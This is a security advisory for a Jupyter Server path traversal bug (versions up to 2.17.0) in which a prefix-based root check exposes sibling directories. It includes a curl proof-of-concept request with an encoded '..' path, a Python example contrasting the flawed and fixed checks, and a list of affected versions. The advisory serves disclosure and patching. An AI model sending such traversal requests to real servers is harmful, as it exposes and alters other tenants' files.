GHSA-5789-5fc7-67v3

Source
https://github.com/advisories/GHSA-5789-5fc7-67v3
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5789-5fc7-67v3/GHSA-5789-5fc7-67v3.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-5789-5fc7-67v3
Aliases
Related
Published
2026-05-05T16:49:10Z
Modified
2026-05-20T08:11:15.547566183Z
Severity
  • 7.1 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L
  • 7.6 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N
Summary
Jupyter Server: Path Traversal via incorrect startswith() root directory check allows access to sibling directories
Details

Summary

Jupyter Server <= 2.17.0 allows access to directories that are siblings of the root directory when the sibling's name starts with the root directory's name.

PoC

Minimal:

.
├── test/              <- root directory.
│   └── test.txt
└── testtest/
    └── secret.txt     <- file to exfiltrate that we should not be able to access via API

HOST="http://localhost:8888"
TOKEN=""
SIBLING="testtest"
TARGET="secret.txt"

curl -s -X POST \
  "$HOST/api/contents/%2e%2e/$SIBLING/$TARGET/checkpoints" \
  -H "Authorization: token $TOKEN"

Full PoC by @stef41: https://gist.github.com/Yann-P/66d4982a965dee8fcb8dd89db29e7006
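To make the flawed check concrete, the following is an added illustrative example (not Jupyter Server's own code) that contrasts a bare startswith() prefix test with a containment check that compares whole path components; it rebuilds the tree above (test/ as root, testtest/ as sibling) in a temporary directory and evaluates both checks on the PoC's ".." path.

```python
import os
import tempfile

# Illustrative reconstruction of the advisory's bug class; not Jupyter Server's code.

def resolve(root_dir: str, requested: str) -> tuple[str, str]:
    """Resolve root and the requested path (relative to root) to absolute real paths."""
    root = os.path.realpath(root_dir)
    target = os.path.realpath(os.path.join(root, requested))
    return root, target

def is_within_root_naive(root_dir: str, requested: str) -> bool:
    """Flawed check: a bare string-prefix test. '/srv/test' is a prefix of
    '/srv/testtest/secret.txt', so a sibling sharing the name prefix passes."""
    root, target = resolve(root_dir, requested)
    return target.startswith(root)

def is_within_root_fixed(root_dir: str, requested: str) -> bool:
    """Hardened check: compare whole path components, so only the root itself
    or paths strictly below it are accepted."""
    root, target = resolve(root_dir, requested)
    return os.path.commonpath([root, target]) == root

def demo() -> dict:
    """Rebuild the advisory's layout (test/ as root, testtest/ as sibling) in a
    temporary directory and evaluate both checks on the PoC's '..' path."""
    with tempfile.TemporaryDirectory() as base:
        root = os.path.join(base, "test")
        sibling = os.path.join(base, "testtest")
        os.makedirs(root)
        os.makedirs(sibling)
        open(os.path.join(root, "test.txt"), "w").close()        # legitimate file
        open(os.path.join(sibling, "secret.txt"), "w").close()   # must stay unreachable
        traversal = os.path.join("..", "testtest", "secret.txt")  # the PoC's %2e%2e path
        unrelated = os.path.join("..", "other", "file.txt")       # sibling without the prefix
        return {
            "naive_allows_sibling": is_within_root_naive(root, traversal),
            "fixed_allows_sibling": is_within_root_fixed(root, traversal),
            "fixed_allows_own_file": is_within_root_fixed(root, "test.txt"),
            "naive_blocks_unrelated": not is_within_root_naive(root, unrelated),
        }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The naive check only rejects siblings whose names do not begin with the root's name, which is exactly the gap the advisory describes.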

Impact

It is possible for an authenticated user to access content outside the server's root_dir in sibling directories whose names share the root_dir's name as a prefix. The attacker can escalate access by reading, writing, and deleting files in those sibling directories.

This has a tangible impact on multi-tenant deployments that use a predictable naming scheme, for example user1, user2, user3, ..., user10, etc.: user1 could access and modify the files of user10 through user19 and higher (any directory whose name begins with user1).

In a hypothetical system where users can choose the name of their folder, an attacker could choose a single-letter username to gain access to a significant number of sibling directories.

Workarounds

Use folder names that do not overlap, i.e. no root directory name should be a prefix of a sibling directory's name.

Acknowledgments

Thank you to @stef41 for providing a useful PoC.

Database specific
{
    "github_reviewed_at": "2026-05-05T16:49:10Z",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-22"
    ],
    "nvd_published_at": "2026-05-05T20:16:38Z",
    "severity": "HIGH"
}
References

Affected packages

PyPI / jupyter-server

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
2.18.0

Affected versions

0.*
0.0.0
0.0.1
0.0.2
0.0.3
0.0.4
0.0.5
0.1.0
0.1.1
0.2.0
0.2.1
0.3.0
1.*
1.0.0rc0
1.0.0rc1
1.0.0rc2
1.0.0rc3
1.0.0rc4
1.0.0rc5
1.0.0rc6
1.0.0rc7
1.0.0rc8
1.0.0rc9
1.0.0rc10
1.0.0rc11
1.0.0rc12
1.0.0rc13
1.0.0rc14
1.0.0rc15
1.0.0rc16
1.0.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.0.11
1.1.0
1.1.1
1.1.2
1.1.3
1.1.4
1.2.0
1.2.1
1.2.2
1.2.3
1.3.0
1.4.0
1.4.1
1.5.0
1.5.1
1.6.0
1.6.1
1.6.2
1.6.3
1.6.4
1.7.0a1
1.7.0a2
1.7.0
1.8.0
1.9.0
1.10.0
1.10.1
1.10.2
1.11.0
1.11.1
1.11.2
1.12.0
1.12.1
1.13.0
1.13.1
1.13.2
1.13.3
1.13.4
1.13.5
1.15.0
1.15.1
1.15.2
1.15.3
1.15.4
1.15.5
1.15.6
1.16.0
1.17.0
1.17.1
1.18.0
1.18.1
1.19.0
1.19.1
1.21.0
1.23.0
1.23.1
1.23.2
1.23.3
1.23.4
1.23.5
1.23.6
1.24.0
2.*
2.0.0a0
2.0.0a1
2.0.0a2
2.0.0b0
2.0.0b1
2.0.0rc0
2.0.0rc1
2.0.0rc2
2.0.0rc3
2.0.0rc4
2.0.0rc5
2.0.0rc6
2.0.0rc7
2.0.0rc8
2.0.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6
2.0.7
2.1.0
2.2.0
2.2.1
2.3.0
2.4.0
2.5.0
2.6.0
2.7.0
2.7.1
2.7.2
2.7.3
2.8.0
2.9.0
2.9.1
2.10.0
2.10.1
2.11.0
2.11.1
2.11.2
2.12.0
2.12.1
2.12.2
2.12.3
2.12.4
2.12.5
2.13.0
2.14.0
2.14.1
2.14.2
2.15.0
2.16.0
2.17.0

Database specific

last_known_affected_version_range
"<= 2.17.0"
source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-5789-5fc7-67v3/GHSA-5789-5fc7-67v3.json"